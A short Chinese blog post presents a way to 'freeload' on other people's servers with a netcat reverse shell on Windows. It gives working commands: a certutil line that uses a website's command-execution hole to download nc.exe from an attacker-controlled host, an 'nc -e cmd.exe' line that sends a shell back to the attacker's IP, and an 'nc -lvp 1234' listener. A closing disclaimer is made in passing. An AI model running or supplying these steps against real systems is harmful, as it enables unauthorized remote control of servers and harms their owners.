今天我想分享一下最近了解到的一个白嫖方法(滑稽),就是利用netcat反弹对方的shell
首先我们了解一下windows防火墙的一些机制,它对出站的数据管控非常宽松,而对于入站的数据管控非常严格,所以我们可以通过命令执行漏洞来上传一个nc(netcat)的exe(这里是针对于windows)文件,再利用nc的shell反弹功能白嫖对方服务器。
这是netcat关于windows版的下载地址 netcat 1.11 for Win32/Win64
首先,对于一些存在命令执行漏洞的网站,我们可以利用我们自己搭建的网站(经费在燃烧,当然,我并没有开通一个网站),通过命令下载我们自己服务器的nc.exe
certutil -urlcache -split -f http://www.hahaha.com/nc.exe nc.exe
如果对方下载成功并命名为nc.exe,我们就可以通过命令执行使用nc反弹shell了
nc -e cmd.exe 自己搭建的网站的ip 端口号 (假设为1234)
然后我们在自己的服务器上面使用nc监听1234端口,其实我们应该先将反弹shell的命令写好但先不执行,先执行监听命令
nc -lvp 1234
监听之后就是这样的,我要本地主机与虚拟机演示一下
所以呢,这就是反弹shell,就到这里了,其实我们可以去找一些在线靶场搞一下(菜汪),白嫖一下,但是我并不建议大家这么搞哦。